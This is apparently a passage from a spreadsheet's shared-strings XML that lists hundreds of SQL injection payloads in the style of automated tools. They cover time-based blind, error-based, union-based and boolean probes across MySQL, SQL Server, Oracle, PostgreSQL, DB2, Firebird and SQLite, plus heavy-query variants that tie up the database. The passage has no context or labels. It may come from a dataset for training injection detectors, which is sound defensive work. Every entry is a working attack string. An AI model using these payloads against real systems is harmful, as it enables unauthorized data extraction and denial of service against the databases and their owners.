    <t>1'  )  )   )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( 'pufu' like 'pufu</t>
  </si>
  <si>
    <t>select  ( case when  ( 6843 = 2657 )  then 6843 else 6843* ( select 6843 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>1'  )  )   )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (   ( 'ibrj' = 'ibrj</t>
  </si>
  <si>
    <t>-2223'  )  )   as mjwp where 8650 = 8650 or 7900 = 5838</t>
  </si>
  <si>
    <t>1' where 9605 = 9605 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 ) --</t>
  </si>
  <si>
    <t>-8667'+ ( select ymmg where 6132 = 6132 union all select 6132,6132,6132,6132,6132,6132,6132,6132#</t>
  </si>
  <si>
    <t>1" waitfor delay '0:0:5' and "syhx" = "syhx</t>
  </si>
  <si>
    <t>1' and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and 'eimq' = 'eimq</t>
  </si>
  <si>
    <t>-5571' union all select 8846,8846,8846,8846,8846,8846,8846#</t>
  </si>
  <si>
    <t>1"  )  )   as nncz where 2331 = 2331</t>
  </si>
  <si>
    <t>1'|| ( select 'gdzt' where 4950 = 4950</t>
  </si>
  <si>
    <t>1"  )  )   as turj where 1237 = 1237</t>
  </si>
  <si>
    <t>1 where 8135 = 8135</t>
  </si>
  <si>
    <t>-5352%'  )  )   )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +ch</t>
  </si>
  <si>
    <t>-6548%" )  union all select 6067,6067,6067,6067,6067,6067,6067,6067,6067--</t>
  </si>
  <si>
    <t>1%" )  union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3# kuqm</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 ) # yrpn</t>
  </si>
  <si>
    <t>1"  )  )   )  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and   (  (   ( "zoag" like "zoag</t>
  </si>
  <si>
    <t>1 )  where 5598 = 5598 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1' where 2967 = 2967</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and  ( '%' = '</t>
  </si>
  <si>
    <t>-4679 where 9634 = 9634 union all select 9634,9634,9634,9634,9634,9634,9634--</t>
  </si>
  <si>
    <t>1' in boolean mode )  or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and 'mcrt' = 'mcrt</t>
  </si>
  <si>
    <t>1'  )  )   )  union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'+ ( select sged where 1181 = 1181 or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )  )  +'</t>
  </si>
  <si>
    <t>1'  )  )   or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>-9613"  )  )   )  or elt ( 3125 = 7084,7084 )  and   (  (   ( "pupl" = "pupl</t>
  </si>
  <si>
    <t xml:space="preserve">1 and elt ( 3172 = 7243,7243 ) </t>
  </si>
  <si>
    <t>1" )  and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-9100 )  or 8792 = 9550--</t>
  </si>
  <si>
    <t>1'  )  )   )  and 2006 = 2006</t>
  </si>
  <si>
    <t>1'|| ( select 'ldad' where 6146 = 6146 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   ) ||'</t>
  </si>
  <si>
    <t>1'+ ( select vfmy where 5711 = 5711</t>
  </si>
  <si>
    <t>1' )  and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and  ( 'yqzg' = 'yqzg</t>
  </si>
  <si>
    <t>-4208%'  )  )   )  or 1133 = 9010--</t>
  </si>
  <si>
    <t>1"  )  )   procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>-4127%' union all select 9558,9558,9558#</t>
  </si>
  <si>
    <t>1 )  as obzn where 7652 = 7652 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) --</t>
  </si>
  <si>
    <t>1" )  where 7588 = 7588 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1" )  and elt ( 4249 = 4249,7259 )  and  ( "xgka" like "xgka</t>
  </si>
  <si>
    <t>1 )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and  ( 3326 = 3326</t>
  </si>
  <si>
    <t>1 where 3027 = 3027 and 4595 = 4595#</t>
  </si>
  <si>
    <t>1%" union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t xml:space="preserve">1' and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) </t>
  </si>
  <si>
    <t>1"  )  )   )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (   ( "umne" like "umne</t>
  </si>
  <si>
    <t>1%'  )  )   )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>select  ( case when  ( 8601 = 1220 )  then 8601 else 8601* ( select 8601 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>1%'  )  )   union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and  ( 8535 = 8535</t>
  </si>
  <si>
    <t>-9434' )  union all select 3106#</t>
  </si>
  <si>
    <t>-4317"  )  )   as nxvn where 2566 = 2566 union all select 2566,2566,2566#</t>
  </si>
  <si>
    <t>-2154%' or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118</t>
  </si>
  <si>
    <t>1  )  )   )  and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t xml:space="preserve">1"  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   ) </t>
  </si>
  <si>
    <t>-1127 or 7391 = 4954</t>
  </si>
  <si>
    <t>-3767' )  as eefl where 8260 = 8260 union all select 8260,8260,8260,8260,8260,8260,8260#</t>
  </si>
  <si>
    <t>1'|| ( select 'ypqa' where 1961 = 1961 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   ) ||'</t>
  </si>
  <si>
    <t>1'+ ( select 'lawc' where 1171 = 1171 or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1%' )  or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>-8200' in boolean mode )  union all select 3360,3360--</t>
  </si>
  <si>
    <t>1'  )  )   and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and   (  (  'bdsq' like 'bdsq</t>
  </si>
  <si>
    <t>-5143'+ ( select 'zyrr' where 8405 = 8405 union all select 8405,8405,8405,8405#</t>
  </si>
  <si>
    <t>-5615' )  where 5931 = 5931 or 8450 = 9229</t>
  </si>
  <si>
    <t>1' )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and  ( 'fupe' = 'fupe</t>
  </si>
  <si>
    <t>1  )  )   as wezj where 2869 = 2869 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>1"  )  )   )  and make_set ( 7809 = 9564,9564 )  and   (  (   ( "jggk" like "jggk</t>
  </si>
  <si>
    <t>1'  )  )   procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>1'|| ( select 'flre' where 8250 = 8250 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   ) ||'</t>
  </si>
  <si>
    <t>-2855' union all select 2495,2495,2495,2495,2495,2495,2495,2495,2495--</t>
  </si>
  <si>
    <t xml:space="preserve">1  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   ) </t>
  </si>
  <si>
    <t>1%" )  or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>1" )  where 4588 = 4588</t>
  </si>
  <si>
    <t>1'|| ( select 'gopc' where 7386 = 7386 and make_set ( 9375 = 7963,7963  )  )  ||'</t>
  </si>
  <si>
    <t>1"  )  )   )  waitfor delay '0:0:5' and   (  (   ( "ckht" = "ckht</t>
  </si>
  <si>
    <t>1  )  )   and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and   (  (  6010 = 6010</t>
  </si>
  <si>
    <t>1'  )  )   and 7533 = 7533 and   (  (  'ialm' = 'ialm</t>
  </si>
  <si>
    <t>1 )  as ahfj where 4776 = 4776 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1" )  where 7914 = 7914 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>1" )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and  ( "dwpa" = "dwpa</t>
  </si>
  <si>
    <t>-3031" union all select 2681#</t>
  </si>
  <si>
    <t>1%" procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>1" )  where 4913 = 4913</t>
  </si>
  <si>
    <t>-8695 union all select 6087,6087,6087,6087,6087,6087,6087,6087,6087,6087#</t>
  </si>
  <si>
    <t>1' where 6902 = 6902 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1" union all select null,null#</t>
  </si>
  <si>
    <t>-4329' )  union all select 1353,1353,1353,1353,1353,1353#</t>
  </si>
  <si>
    <t>-9856" union all select 9753--</t>
  </si>
  <si>
    <t>1  )  )   )  rlike sleep ( 5 )  and   (  (   ( 6790 = 6790</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) +'</t>
  </si>
  <si>
    <t>1"  )  )   as ftts where 3671 = 3671 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'owzs' where 1475 = 1475 union all select null--</t>
  </si>
  <si>
    <t>1 )  where 1013 = 1013 and 5573 = 9445#</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  and sleep ( 5 ) </t>
  </si>
  <si>
    <t>1 where 7890 = 7890 or sleep ( 5 ) --</t>
  </si>
  <si>
    <t>1"  )  )   or sleep ( 5 )  and   (  (  "mtmb" like "mtmb</t>
  </si>
  <si>
    <t>1'|| ( select 'fqoz' where 9794 = 9794 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'  )  )   or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (  'gyre' = 'gyre</t>
  </si>
  <si>
    <t>1%"  )  )   or elt ( 6272 = 6272,sleep ( 5  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1"  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and "cbck" like "cbck</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and  ( "tpry" = "tpry</t>
  </si>
  <si>
    <t>1"  )  )   as wssb where 5772 = 5772</t>
  </si>
  <si>
    <t>1"" ( .'. ( , ( .</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1'  )  )   as azsd where 3870 = 3870 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1'+ ( select 'gprq' where 8928 = 8928</t>
  </si>
  <si>
    <t>1"  )  )   and 6486 = 3843 and   (  (  "fbka" like "fbka</t>
  </si>
  <si>
    <t>1"  )  )   )  and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( "epwi" like "epwi</t>
  </si>
  <si>
    <t>1'  )  )   rlike sleep ( 5 )  and   (  (  'tufg' = 'tufg</t>
  </si>
  <si>
    <t>1 )  where 7775 = 7775 union all select null,null,null,null--</t>
  </si>
  <si>
    <t>1  )  )   )  union all select null,null--</t>
  </si>
  <si>
    <t>1%'  )  )   and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1 )  as bozx where 2160 = 2160 and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1 )  where 9446 = 9446 union all select null#</t>
  </si>
  <si>
    <t>1  )  )   )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 2952 = 2952</t>
  </si>
  <si>
    <t>1%"  )  )   )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1'+ ( select thmg where 2546 = 2546 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>-6075' union all select 9988,9988,9988,9988,9988,9988,9988,9988,9988#</t>
  </si>
  <si>
    <t>-8515' or 1329 = 9536</t>
  </si>
  <si>
    <t>1" )  where 8702 = 8702 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>1' )  as elnu where 5719 = 5719 or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1" rlike sleep ( 5 )  and "rylv" like "rylv</t>
  </si>
  <si>
    <t>1'|| ( select 'cgup' from dual where 5383 = 5383 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1 )  where 7050 = 7050</t>
  </si>
  <si>
    <t>1%"  )  )   union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1" )  as nraw where 7984 = 7984 and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>-5193 where 2175 = 2175 union all select 2175,2175,2175,2175,2175,2175,2175,2175,2175,2175#</t>
  </si>
  <si>
    <t>-8378%' )  union all select 5491#</t>
  </si>
  <si>
    <t>-8612' )  as toeu where 6357 = 6357 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 )</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and  ( 'qcsv' = 'qcsv</t>
  </si>
  <si>
    <t>-8454" or 6872 = 6872</t>
  </si>
  <si>
    <t>1 )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( 3343 = 3343</t>
  </si>
  <si>
    <t>1" )  where 9062 = 9062</t>
  </si>
  <si>
    <t>1'  )  )   and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  'tnfm' like 'tnfm</t>
  </si>
  <si>
    <t>-6405' union all select 8235,8235,8235,8235,8235#</t>
  </si>
  <si>
    <t>1'  )  )   )  or sleep ( 5 )  and   (  (   ( 'wuwv' = 'wuwv</t>
  </si>
  <si>
    <t>1%" )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and  ( "%" = "</t>
  </si>
  <si>
    <t>-4091"  )  )   )  union all select 6694,6694--</t>
  </si>
  <si>
    <t>1' where 7445 = 7445 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1" )  where 4426 = 4426 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1'+ ( select mumb where 4658 = 4658 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1 )  where 3381 = 3381 and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) --</t>
  </si>
  <si>
    <t>1" where 7232 = 7232  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users ) --</t>
  </si>
  <si>
    <t>-4694' )  where 1501 = 1501 union all select 1501,1501,1501,1501,1501,1501#</t>
  </si>
  <si>
    <t>1'  )  )   or elt ( 6272 = 6272,sleep ( 5  )  )   and   (  (  'cwjd' = 'cwjd</t>
  </si>
  <si>
    <t>1' )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and  ( 'sqni' like 'sqni</t>
  </si>
  <si>
    <t>1 )  as rqac where 3381 = 3381 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t xml:space="preserve">make_set ( 8734 = 8734,sleep ( 5  )  )  </t>
  </si>
  <si>
    <t>1  )  )   as berd where 5803 = 5803 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1 )  where 2930 = 2930</t>
  </si>
  <si>
    <t>1 )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( 7182 = 7182</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and  ( 1491 = 1491</t>
  </si>
  <si>
    <t xml:space="preserve">1' and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) </t>
  </si>
  <si>
    <t>-9587 union all select 1568,1568,1568,1568,1568,1568#</t>
  </si>
  <si>
    <t>1%" union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-9884' )  or elt ( 1942 = 8409,8409 )  and  ( 'tqdq' like 'tqdq</t>
  </si>
  <si>
    <t>1" or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and "snht" = "snht</t>
  </si>
  <si>
    <t>-9082 union all select 9858,9858,9858,9858,9858,9858--</t>
  </si>
  <si>
    <t>1 )  as mtnw where 7293 = 7293 and 2603 = 5764--</t>
  </si>
  <si>
    <t>1"  )  )   )  union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1" )  where 9962 = 9962 and 4595 = 4595#</t>
  </si>
  <si>
    <t>-8793' where 3853 = 3853 union all select 3853,3853,3853,3853,3853,3853,3853,3853#</t>
  </si>
  <si>
    <t xml:space="preserve">1' or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) </t>
  </si>
  <si>
    <t xml:space="preserve">1' and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  </t>
  </si>
  <si>
    <t>-6263" union all select 8005,8005#</t>
  </si>
  <si>
    <t>1' and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and 'lvyw' = 'lvyw</t>
  </si>
  <si>
    <t>1" )  where 4878 = 4878 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) --</t>
  </si>
  <si>
    <t>-3107' )  where 7782 = 7782 or 8571 = 8571--</t>
  </si>
  <si>
    <t>-8809'|| ( select 'hyzr' where 5694 = 5694 union all select 5694--</t>
  </si>
  <si>
    <t>1"  )  )   or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (  "umfr" like "umfr</t>
  </si>
  <si>
    <t>1'  )  )   )  waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1" or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>-8703' )  where 9723 = 9723 union all select 9723,9723,9723,9723,9723#</t>
  </si>
  <si>
    <t>1%' and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and '%' = '</t>
  </si>
  <si>
    <t>-8544%" or 6872 = 6872 and "%" = "</t>
  </si>
  <si>
    <t>-2855"  )  )   )  union all select 1496,1496,1496,1496#</t>
  </si>
  <si>
    <t xml:space="preserve"> end and   (  (  2160 = 2160</t>
  </si>
  <si>
    <t>select  ( case when  ( 9907 = 2736 )  then 9907 else 9907* ( select 9907 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and '%' = '</t>
  </si>
  <si>
    <t>1' )  rlike  ( select  ( case when  ( 9308 = 2540 )  then 1 else 0x28 end  )  )   and  ( 'rghd' = 'rghd</t>
  </si>
  <si>
    <t>-5431"  )  )   )  or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||ch</t>
  </si>
  <si>
    <t>1'+ ( select hkrg where 3665 = 3665</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>-5067'  )  )   or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  'vkab' like 'vkab</t>
  </si>
  <si>
    <t>1'|| ( select 'oxam' from dual where 7162 = 7162 and make_set ( 8403 = 8403,8899  )  )  ||'</t>
  </si>
  <si>
    <t>1' in boolean mode )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) #</t>
  </si>
  <si>
    <t>1"  )  )   as vgsb where 4747 = 4747</t>
  </si>
  <si>
    <t>-3090" or make_set ( 9354 = 9354,7185 )  and "qowe" like "qowe</t>
  </si>
  <si>
    <t>1" where 2394 = 2394 and 8831 = 8333--</t>
  </si>
  <si>
    <t>1" )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( "otgh" like "otgh</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) </t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and 'gpeo' like 'gpeo</t>
  </si>
  <si>
    <t>1'  )  )   procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and   (  (  'kufi' = 'kufi</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( 'afdy' like 'afdy</t>
  </si>
  <si>
    <t>1'  )  )   )  or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>-1526" )  where 4870 = 4870 union all select 4870,4870,4870,4870,4870,4870,4870,4870,4870,4870#</t>
  </si>
  <si>
